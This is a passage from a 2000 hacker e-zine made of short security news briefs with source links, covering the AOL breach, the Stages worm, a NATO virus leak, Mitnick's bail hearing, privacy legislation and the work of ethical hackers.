just getting more press this time.) Associated Press - via Yahoo Reuters - via Yahoo ABC News CNN ZD Net Observers UK has posted a few articles that are little bit more technical and offer a glimpse inside the setup of the AOL network. They talked with Retired who offers a step by step method of accessing the internal AOL network. AOL naps while hackers attack CRIS access: The Mecca of ao-haxors http://dailynews.yahoo.com/h/ap/20000616/tc/aol_hacked_1.html http://dailynews.yahoo.com/h/nm/20000616/wr/aol_hackers_dc_1.html http://abcnews.go.com/sections/tech/DailyNews/aol000616.html http://www.cnn.com/2000/TECH/computing/06/17/aol.hacker.01/index.html http://www.zdnet.com/zdnn/stories/news/0,4586,2589679,00.html http://www.observers.net/securecris.html http://www.observers.net/crisreply.html @HWA 181.0 [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime After Microsoft and Omni Tech donated software and computers to the Suburban Law Enforcement Academy of the College of DuPage in Naperville, Illinois, the marketing machines of Omni Tech and the academy started making claims that "every class they've ever held, they actually catch someone in an act of perpetrating a crime..." Lewis Koch of zdnet attempted to verify these claims, but school officials would not give him any examples, and the DuPage County prosecutor's office couldn't provide any corroborating reports. School officials refused to explain this disparity. They also refused to discuss the qualifications of the staff to teach computer crime courses, the curriculum, or to let Koch view the course. ZD Net http://www.zdnet.com/zdnn/stories/comment/0,5859,2588873,00.html @HWA 182.0 [HNN] June 19'00 Los Alamos Hard Drives Found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Dave Two missing computer hard drives containing sensitive nuclear weapons data from the Los Alamos National Laboratory have been recovered, federal authorities announced Friday. The drives where found behind a copy machine that had already been searched once. Officials say they will continue to investigate the matter to determine if the data has been compromised. CNN Reuters - via C|Net http://www.cnn.com/2000/ALLPOLITICS/stories/06/16/losalamos.disks/inde x.html http://news.cnet.com/news/0-1003-200-2093750.html?tag @HWA 183.0 [HNN] June 19'00 Japanese Exercise CyberCrime Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime Japanese authorities on the northern island of Hokkaido have arrested a man they say unlawfully penetrated through the firewall of a Web site, the fifth such arrest since a new cyber crime law went into effect earlier this year. ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2589803,00.html?ch kpt @HWA 184.0 [HNN] June 19'00 Anti Pedephile Groups Take on the Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime Antichildporn.org, condemmend.org, and EHAP are all searching for pedophiles in an attempt to remove them and their content from the net. While some of the methods they use may not be ethical they say they are all legal. (Unfortunately there is no way to verify how effective these groups are.) ABC News http://abcnews.go.com/sections/tech/DailyNews/antiporn000616.html @HWA 185.0 [HNN] June 19'00 More E-Zines ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by L33t Dawg Issue #6 of Hack In The Box's zine is ready and available. HAO has released its premier E-zine, titled (EnLighten2000). The new E-zine has a news, windows, mac, linux, and info section. Also HWA.hax0r.news has released issued #53. Hack In the Box HAO HWA.hax0r.news http://www.hackinthebox.org http://www.hao.org http://welcome.to/HWA.hax0r.news/ @HWA 186.0 [HNN] June 20'00 Stages Virus Starts to Become Widespread ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow Just another copycat trojan/worm is making the rounds of corporations in the US, Australia, Asia, and elsewhere. Like ILOVEYOU, the latest virus automatically sends copies to everyone listed in the Microsoft Outlook program's address book. Both viruses can also spread through chat rooms. The new virus uses a Windows feature called Shell Scrap Object to activate. The virus carries an ".shs" suffix but Windows computers are generally configured to hide the suffix, making the file appear to contain only text. The virus appears to be written by Zulu, the same person that is believed to have written the Bubbleboy virus that appeared last year. Associated Press - via Canada.com ZD Net VBS_Stages.A - via Trend Micro http://www.canada.com/cgi-bin/cp.asp?f http://www.zdnet.com/zdnn/stories/news/0,4586,2590403,00.html http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName @HWA 187.0 [HNN] June 20'00 Employees Sue Employer For Firing Over NetBus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by RenderMan About a year ago two gentlemen in New Zealand were evaluating Netbus Pro for tech support use, and because of this they were fired by their employer. They are now taking their employer to court. With Recent changes to the treatment of Netbus, this case should be interesting as to establish what truly makes some code malicious. In one of the defendant own words he writes about the events that lead up to this and Renderman looks at the issue of the power that Anti-Virus definitions can wield. Defendants own words RenderMan's summary and background http://www.antiav.com/NZrant.html http://www.antiav.com/NZcase.html @HWA 188.0 [HNN] June 20'00 The Cyberterror Scare of 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench So where is the "electronic pearl harbor" that is supposed to cripple the US Internet Infrastructure? Last year experts were warning about malicious code being hidden as Y2K fixes it is now June and nothing has happened. Kevin Poulsen takes a look at these and other questions in his latest article. Security Focus http://www.securityfocus.com/templates/article.html?id @HWA 189.0 [HNN] June 20'00 AOL Increases Network Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by q bahl AOL has revealed that intruders accessed their system by targeting specific employees with Trojan laden email attachments. AOL said that about 200 accounts total had been compromised but that they have have increased their security level in the wake of the intrusion. AOL has said that it will involve law enforcement once its internal investigation is completed. C|Net - via Yahoo http://dailynews.yahoo.com/h/cn/20000619/tc/aol_boosts_email_security_ after_attack_1.html @HWA 190.0 [HNN] June 20'00 Poll Says Americans Are Afraid of CyberCrime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench A poll released Monday at a conference of technology executives and law enforcement officials claims that two thirds of Americans are concerned about the threat cybercriminals. The poll was commissioned by EDS and the Information Technology Association of America. The poll included the responses of 1000 people. (1,000 people speak for the entire country?) Associated Press http://dailynews.yahoo.com/h/ap/20000619/tc/cybercrime_2.html @HWA 191.0 [HNN] June 20'00 Cyber Defense Still Looked at As Part of Cold War ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Sen. Charles Schumer (D-N.Y.) at a recent symposium blamed current cyber defense spending on the Cold War mentality. Other officials echoed these concerns saying that without an electronic Pearl Harbor it was difficult to convince leaders to spend the required moneys. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0619/news-dfnse-06-19-00.asp @HWA 192.0 [HNN] June 20'00 FAA Opens Cyber Security Office ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Raymond Long hopes to plug the holes in the Federal Aviation Administration'9s network that may be at risk of intrusion, both in nationally deployed systems and systems unique to each airport. The office was officially opened in May and has been headed by Mr. Long who was the FAA's Y2K czar. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0619/pol-isec-06-19-00.asp @HWA 193.0 [HNN] June 21'00 Credit Taken for Stages Worm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Bruce Hughes, a manager at ICSA.net believes he has identified the author of the Stages Worm. 'Zulu' is believed to live in Argentina, speaks Spanish and English, and has written several virus/worms including Bubbleboy, Monopoly, FreeLinks, and others. The FBI has been reported as investigating the case. Reuters - via Nando Times Reuters - via Fox News http://www.techweb.com/wire/story/reuters/REU20000620S0009 http://www.foxnews.com/vtech/0620/t_rt_0620_33.sml @HWA 194.0 [HNN] June 21'00 Drug Office Tracks Web Visitors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Banner The White House Office of National Drug Control Policy has cookie enabled the ad banners that are used in its anti-drug media campaign. The banner ad direct users to Freevibe.com a site sponsored by the Drug office. The office says that the cookies are just a method of tracking its ad campaign and were not meant to track users and that the information would not be sold or given to third parties. However the ad campaign is being controlled by Doubleclick which has come under serious fire collating web surfers information and violating users privacy. Scripps Howard News Service http://shns.scripps.com/shns/story.cfm?pk @HWA 195.0 [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench NATO scientists at the Kfor peacekeeping force headquarters in Pristina, Kosovo created a virus that would secretly email documents from victims hard drives. Unfortunately the virus escaped into the wild and is being blamed for leaking a nine-page document detailing the rules of engagement for NATO-soldiers to the press. The virus is called 'Anti-Smyser 1' and is alleged to be a variation of a MS Word macro virus known as THUS.Q. The Times UK http://www.the-times.co.uk/news/pages/sti/2000/06/18/stinwenws01024.ht ml @HWA 196.0 [HNN] June 21'00 Mexico Hires Hackers To Crack Password ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles The Mexican leftist Democratic Revolution Party (PRD) is trying to crack the password to a a secret list of beneficiaries of a controversial $100 billion bank bailout that followed a currency crisis in 1994 and 1995. Four of the five passwords that protect the data are known and they are working on the last one. the party has hired 'hackers' to help them with the task. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000620/wr/mexico_hackers_dc_1.html @HWA 197.0 [HNN] June 21'00 Privacy Issues Get Attention In Congress ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow About 300 privacy bills are pending in both the House and Senate. While most appear to be election year pandering they are starting to attract attention. The debates are centering around the opt-out or opt-in methodologies of collecting personal information. Boston Globe - Computer News Daily http://199.97.97.16/contWriter/cnd7/2000/06/20/cndin/9395-0023-pat_nyt imes.html @HWA 198.0 [HNN] June 21'00 More Speakers for H2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by macki Hope 2000 has added a new round of speakers and panels in preparation for the July 14-16 conference in New York City. H2K http://www.h2k.net/panels.html @HWA 199.0 [HNN] June 22'00 White House Supports P3P ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Scully The White House has come out in support of the World Wide Web Consortium's Platform for Privacy Preferences Project standard. P3P will work within a web browser and interact with a web site automatically. The browser will follow the preferences set by the user and warn the user if the web site attempts to violate those preferences. Privacy advocates disagree and feel that the P3P standard will allow web sites even more access to to personal information than they have now. (It does sounds like another election year bull shit ploy, but we'll see.) The White House - Office of the Press Secretary. ZD Net Electronic Privacy Information Center - Pretty Poor Privacy: An Assessment of P3P and Internet Privacy http://usinfo.state.gov/cgi-bin/washfile/display.pl?p http://www.zdnet.com/zdnn/stories/news/0,4586,2591856,00.html http://www.epic.org/reports/prettypoorprivacy.html @HWA 200.0 [HNN] June 22'00 FSA Calls Bank Security Weak ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow The Financial Services Authority (FSA), the UK's financial services regulator, has told banks that they must take more care with their online security. The FSA said there was a high risk with new IT employees because adequate background checks where not being performed and that while banks tend to have reasonable perimeter security, they often found insufficient segregation between internal and external systems, as well as poor internal security in general. Newsbytes http://www.newsbytes.com/pubNews/00/150881.html @HWA 201.0 [HNN] June 22'00 Nike.com Redirected ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench A group known as S-11 redirected the nike.com home page to a site calling for action at the World Economic Forum 2000 on Sept. 11-13 in Melbourne, Australia. Nike technicians have regained control of the site and have launched an internal investigation. Attrition.org - Mirror Associated Press - via Yahoo Nando Times http://www.attrition.org/mirror/attrition/2000/06/21/www.nike.com/ http://dailynews.yahoo.com/h/ap/20000621/tc/nike_hackers_1.html http://www.nandotimes.com/technology/story/0,1643,500219236-500312244- 501742874-0,00.html @HWA 202.0 [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench A new regulation within China prevents Cybercafes from operating within 200 meters of schools forcing many to close. Police in Xiamen, in China's Fujian province, have shut down 45 Internet cafes in the city, The city's Public Security Bureau insisted it must increase its role as an "Internet policeman". The UK Register http://www.theregister.co.uk/content/1/11480.html @HWA 203.0 [HNN] June 22'00 Freeware Available to Track Napster Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The release of Media Enforcer now puts the power of NetPD into the hands of everyone. This freeware application can track users, IP address, tracks traded and other information of both Napster and Gnutella users. Since the software can also be used to find MP3s the author insists on a personal email before releasing the full version. ZD Net Media Enforcer http://music.zdnet.com/features/enforcer/?chkpt http://mediaenforcer.tripod.com/enforcer/index.html @HWA 204.0 [HNN] June 22'00 ECTF labeled Cyber-Mod Squad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue The Electronic Crimes Task Force, a collaboration of local, state and national law enforcement groups is headed by the New York office of the Secret Service has been called a 240 person "cyber-mod squad". It would appear however that the group deals mostly with cloned cell phones, identity thefts and stolen credit cards with an actual cybercrime thrown in here and there. (Just because a criminal uses the Internet does not make it a cybercrime.) Computer World http://www.computerworld.com/cwi/story/0,1199,NAV47_STO45927,00.html @HWA 205.0 [HNN] June 22'00 Eleven Story Tall Tetris Game ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Lady Sharrow Definitely a hardware hack if there ever was one. Members of Technology House at Brown University created La Bastille, an eleven story Tetris game. It contains eleven custom-built circuit boards, a twelve-story data network, a personal computer running Linux, a radio-frequency video game controller, and over 10,000 Christmas lights, La Bastille transforms Brown's fourteen-story Sciences Library into a giant video display which allows by standers to play a game of Tetris which can be seen for several miles. Tech House http://www.techhouse.org @HWA 206.0 [HNN] June 23'00 DMCA Hearings Held By US Copyright Office ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond The US Copyright office has been holding hearings regarding exemptions to the Section 1201 ban on circumvention of access control technologies, enacted by the Digital Millennium Copyright Act in 1998. This prohibition on circumvention becomes effective on October 28, 2000. In the meantime, the Copyright Office will hold hearings to determine whether there are particular classes of copyrighted works that shall be exempted from the prohibition due to the inability of users to use the works in a noninfringing way. Cryptome US Copyright Office http://cryptome.org/dmca-hearings.html http://www.loc.gov/copyright/1201/anticirc.html @HWA 207.0 [HNN] June 23'00 COPA Appeal Rejected! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond The 3rd U.S. Circuit Court of Appeals in Philadelphia has upheld lower court rulings that say that the Child Online Protection Act of 1998 is unconstitutional. The three judge panel said in a rather scathing opinion that the measure was so unconstitutionally broad it affected even non-pornographic websites. The Justice Department still has the ability to appeal to the Supreme Court, get the case remanded for trial, or give up. Wired US Courts - Judges decision http://www.wired.com/news/politics/0,1283,37171,00.html http://pacer.ca3.uscourts.gov/recentop/week/991324.txt @HWA 208.0 [HNN] June 23'00 Mitnick Back In Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by macki On Monday June 26 Kevin will head back to court for a clarification of the terms of his bail. At issue are the terms "consultant or advisor" which are mentioned within Kevin's bail conditions as being activities that he is prohibited to do. Kevin feels that giving talks to various groups, including the US Senate, does not violate this provision. FREE KEVIN http://www.freekevin.com @HWA 209.0 [HNN] June 23'00 Security Glitch Brings Lawsuit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by renderman An Edmonton man found a way to beat the odds. Zues Yaghi found a glitch in the programming of certain slot machines. The manufacturer, WMS Gaming Inc. of Chicago, has launched a $10-million lawsuit against him. (Why does this reaction sound like that of any one of a number of security glitches and bugs found in the computer security world? Security by obscurity does not work. Of course with Defcon just around the corner I'm sure a lot of people would like to know what this glitch is.) Edmonton Journal http://www.edmontonjournal.com/stories1/000622/4325404.html @HWA 210.0 [HNN] June 23'00 UAE Files Charges Against British Worker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles A British man working in the United Arab Emirates has been accused of breaking into various computer systems and 'damaging the economy'. The man activities had been traced by the Emirates Telecommunications Corp (Etisalat) network security staff. UAE has no specific laws regarding computer attacks but that a charge of 'damaging the economy' carries a maximum penalty of ten years. Reuters - via Excite http://news.excite.com/news/r/000622/04/net-emirates-hacker-dc @HWA 211.0 [HNN] June 23'00 Feedback on Female Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond ABC received so much feedback from its original story about women in the underground that it has decided to publish some of the those comments which for the most part are pretty good. ABC News http://abcnews.go.com/sections/tech/DailyNews/hackerfeedback_000619.ht ml @HWA 212.0 [HNN] June 23'00 Online Retailers Don't Provide Adequate Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow A study entitled "Top of the E-Class: Ranking and Best Practices of over 170 Web Sites" found that on-line retailers fail to provide shoppers with adequate security and privacy protection. The report, commissioned for Ryerson Polytechnic University's Center for the Study of Commercial Activity , found a full third of retailers did not even meet minimum security standards The Globe and Mail http://www.globetechnology.com/archive/gam/News/20000622/RSECU.html @HWA 213.0 [HNN] June 23'00 Better to Be Scared Than Sorry? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by newbie While administrators and users need to treat all reports of every threat seriously this article seems to suggest that crying wolf is an itself acceptable. It should be the responsibility of the security industry to verify that its information is absolutely correct before informing the media. Creating a nationwide cyber panic over a threat that does not exist is not helpful, does not heighten awareness, and does not increase security. Instead it wastes time, desensitizes users, and costs corporations money. Computer World - via CNN http://www.cnn.com/2000/TECH/computing/06/21/security.warning.idg/inde x.html @HWA 214.0 [HNN] June 23'00 Snooping Enters the Mainstream ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench With the low cost availability of software that allows keystroke recording many people are finding just how easy it is to snoop on someone else. Spyware is becoming all the rage with spouses who suspect cheating, parents who suspect anything, and employers who want to check up on their employees. NY Times http://www.nytimes.com/library/tech/yr/mo/circuits/articles/22pete.htm l @HWA 215.0 [HNN] June 26'00 24,000 Credit Card Numbers At Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles A pioneering internet service provider in England has become the victim of an online attack. Redhotant lost its entire customer database which included names, addresses, passwords and credit card numbers. The ISP has denied that the break in has occurred but a security consultant has told The Times UK, that he was able to access the Database. The Times UK http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.ht ml @HWA 216.0 [HNN] June 26'00 Russians Introduce Cyber Doctrine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles President Vladimir Putin's powerful Security Council has approved an 'information security doctrine' to strengthen the government's role in monitoring information flow within Russia. The unpublished doctrine is supposed to protect journalists rights, crack down on cybercrime and support the telecom industry. Associated Press - via The Age http://www.theage.com.au/breaking/0006/24/A30741-2000Jun24.shtml @HWA 217.0 [HNN] June 26'00 Mitnick In Court Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Sarge Kevin Mitnick will return to court today in an effort to clarify his bail conditions. When released from jail earlier this year he was told that he could not 'consult' on computer related matters. It is hoped that he will be able to convince the judge that lectures and writing a column for an online magazine do not constitute 'consulting'. Reuters - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2593948,00.html @HWA 218.0 [HNN] June 26'00 More Info Reported Missing At Los Alamos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow An audit of classified information at Los Alamos turned up two 10-year-old floppy disks missing. The disks where found the next day. The audit also found an equipment closet unlocked inside a secure room. The Department of Energy will be investigating both events. (Ten year old floppies? Hello? Floppies are only valid for approximately six months.) APB News http://www.apbnews.com/newscenter/breakingnews/2000/06/24/losalamos062 4_01.html @HWA 219.0 [HNN] June 26'00 The HoneyNet Research Project ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Al A pretty unconventional research paper was recently released which focuses on an examination of black-hat activity following the compromise of a honeynet setup. This paper is the result of the work and research of the Honeynet Project,which shows detailed keystroke logs of everything that these unsuspecting blackhats did to hack and maintain root on the system, as well as full transcripts of their IRC sessions while they were being watched. The Honeynet Project estimates that over 370 other systems were compromised in this two-week period by the same individuals. Security Focus http://www.securityfocus.com/frames/?focus @HWA 220.0 [HNN] June 26'00 Cell Phones And Driving Don't Mix ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow Singapore, known for its strict anti-littering and anti-chewing gum laws, now plans to jail motorists who hold mobile phones to their ears while driving. Violators face a six-month jail term for a first offense or a S$1,000 ($588 U.S.) fine, or both, and a driving ban. A second offense would double the fine and jail term. (Hang up and drive.) ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2593947,00.html?ch kpt @HWA 221.0 [HNN] June 26'00 New Viruses Attack The Soul ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid It is no longer a question of what a virus does but how it gets the user to execute it. How well the software social engineers the user into executing the email attachment is the critical step in getting an email virus to propagate widely. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2593514,00.html @HWA 222.0 [HNN] June 26'00 Traditional Hackers Upset Over Use of Term ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid Hacker, cracker, criminal, we have heard it all before but for some reason this angle still gets press. hackers are upset about the use the term 'hacker' to describe criminals. (Yawn, now there is up to the minute reporting for you.) Australian Financial Review http://www.afr.com.au/reports/20000620/A19851-2000Jun19.html @HWA 223.0 [HNN] June 27'00 Oracle Admits to Spying on Microsoft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by ted The second largest software company in the world has admitted that it hired a detective agency to investigate the allies of the largest software company in the world. In a statement released yesterday Oracle admitted that it hired Investigative Group International Inc. to expose certain industry trade groups as puppets of Microsoft. Wall Street Journal The Register UK http://interactive.wsj.com/articles/SB962146554881934536.htm http://www.theregister.co.uk/content/1/11637.html @HWA 224.0 [HNN] June 27'00 FBI To Investigate Stages Worm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow After 12 days the Stages worm has caused many headaches for administrators and ISPs. The FBI has announced that they are now starting an investigation into who and where the worm came from. Initially they believe that the virus/worm originated in Argentina. When the virus/worm is triggered, it appears to activate links to pornographic sites and changes the home page of the victims' Internet Explorer browser to a porn site. Newsbytes Stages - via Computer Associates http://www.newsbytes.com/pubNews/00/151173.html http://www.ca.com/virusinfo/ @HWA 225.0 [HNN] June 27'00 Mattel Will Remove Spyware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Renderman Mattel has announced that they will be releasing a tool to uninstall spyware included with many of their children titles such as 'Reader Rabbit', 'Arthur' and 'Little Bear'. The software, known as "Broadcast," would send a product identification number and some technical information to Mattel and then download advertising for products targeted at the user. Strangely enough this spyware does not fall under COPPA because Mattel is not a web-site or on-line service, however Mattel decided to stop using the software anyway. (Well, that's mighty nice of them.) ABC News url vanished! @HWA 226.0 [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Jonas.Bijunas Russia's FSB domestic security service said on Monday it had exposed and detained a Lithuanian on charges he spied for the United States by breaking into its computer systems. The FSB claimed that the spy admitted to the acts and that the goal was to penetrate information systems to determine their structure, defensive measures, and to create holes for later use. Reuters - via AltaVista Live http://live.altavista.com/scripts/editorial.dll?ei @HWA 227.0 [HNN] June 27'00 BSA Settles With 20 Companies ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow The Business Software Alliance has announced 20 settlements with companies it found to be copying programs or using unlicensed copies. The settlements will result in more than $2.4 million in fines to be paid to BSA. Details of the settlements will be made over the next week. (Milk it for all its worth) ABC News e-commerce Times http://abcnews.go.com/sections/tech/DailyNews/piracy000627.html http://www.ecommercetimes.com/news/articles2000/000627-5.shtml @HWA 228.0 [HNN] June 27'00 UAE Telecom Firm Will Prosecute ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid United Arab Emirates telecomunications firm Etisalat has vowed to prosecute anyone who abuses the country's Internet system. Lee Alan Ashurst, 21, of Manchester, England, is suspected by Etisalat officials of breaking into the systems and causing service disruptions earlier this month, has denied the accusations and said he had filed lawsuits for defamation and damages against Etisalat. Reuters - Yahoo http://dailynews.yahoo.com/h/nm/20000628/wr/emirates_hacker_dc_2.html @HWA 229.0 [HNN] June 28'00 Oracle Admits to Spying on Microsoft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by ted The second largest software company in the world has admitted that it hired a detective agency to investigate the allies of the largest software company in the world. In a statement released yesterday Oracle admitted that it hired Investigative Group International Inc. to expose certain industry trade groups as puppets of Microsoft. Wall Street Journal The Register UK http://interactive.wsj.com/articles/SB962146554881934536.htm http://www.theregister.co.uk/content/1/11637.html @HWA 230.0 [IND] UK: White-hat Hacker Engaged In Black Arts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 23 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_052300a_j.shtml 5/23/00 UK: White-hat Hacker Engaged In Black Arts MICK is an ethical hacker. There is not much more we can say about him, not even his real name, except that he lives in the UK and is a frontline fighter in the escalating war against cybercrime. Mick is employed by IBM Global Services as a "white-hat" hacker. His days are spent trying to break into the computer networks of IBM's clients, either remotely on the Internet or in disguise by infiltrating the client's building and hacking into the computer system on site. Only one person within the target organisation, usually a senior executive, will know Mick's identity. He is armed with a waiver from prosecution should the mission be successful in exposing flaws in a company's computer security. Mick says he used to write security products, such as fire walls for keeping intruders and viruses out of companies' computer networks, before moving on to IBM's ethical hacker team. "IBM thought it would be good to have somebody who makes security, break security," he says. Mick says his work is vital in protecting companies, and ultimately their customers, from cybercrimes such as viruses, the distributed denial of service (DDOS) attacks that hit Yahoo! and other Internet sites earlier this year and credit card fraud. His enemies range from kids messing about with virus-writing tools available over the Internet to disgruntled employees and seriously intelligent "black hat hackers" out to do maximum damage to a company through its computers. The FBI and Interpol have identified a growing trend in unethical companies and countries employing black-hat hackers to damage rival companies and even countries. "There is definitely information warfare going on," Mick says. One of the biggest problems faced by providers of computer security services is an understandable reluctance on the part of companies to admit their security flaws or report breaches. Mick says that the DDOS attacks and this month's ILOVEYOU virus, which both cost industry billions of pounds, have raised awareness and budgets for computer security. Mick says UK companies must embrace computer security by putting comprehensive policies in place and regularly updating and testing defences. "In the US, security has a great profile from CEO down to the cleaner," he says. "The UK has a lot to learn, but it is learning very fast." Jonathon Fornaci, chief executive of AtomicTangerine, an Internet consultancy firm spun out of the Stanford Research Institute, says computer security is "critical" as companies embrace e-business. He says governments around the world are tackling the problem, but have admitted that they are virtually powerless to protect companies and consumers from cybercrime. He says it is up to companies to protect themselves. Mick agrees: "There is a limit to what the Government can do. You can't spend hundreds of thousands of pounds of resources to catch somebody who's doing minimal damage. You don't take the whole Hampshire police force to track down a jaywalker." Fornaci believes that companies also share a "social and moral obligation" to employ sound computer security systems because of the trend for hackers and virus writers to use companies' websites as staging posts for attacks on other companies. By Clive Mathieson. (c) Times Newspapers Ltd, 2000. THE TIMES 20/05/2000 P31 @HWA 231.0 [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 23 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_052300b_j.shtml 5/23/00 India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security. MUMBAI: A new breed of hackers is on the loose. They are not the ones who have been giving corporate IT managers nightmares so far - - teenagers sitting in some dark room, attacking corporate computer systems or stealing vital data. The new species carries a valid `double oh' license. They are fully authorised to hack into companies, ranging from banks to e-commerce organisations. Reason? To thoroughly check system security and plug relevant problems. Many of them are pioneers in a shadowy business that may seem more like a scene from the Hollywood blockbuster `The Net,' where Sandra Bullock falls victim to a group of expert computer hackers, than reality. Global professional services firm Ernst & Young actually gets paid for hiring out their `ethical hackers' to large companies, mostly in the banking, insurance, B2B and B2C arenas. With the proliferation of dotcoms here, the scene is merely warming up, with the web becoming an even more attractive playground for hackers. Mushrooming e-commerce has meant an increasing volume of sensitive data, specially financial data, getting transferred over the Internet. As a result, a hacker attack is no longer a mere annoyance for companies. It could lead to maor financial loss. "75 per 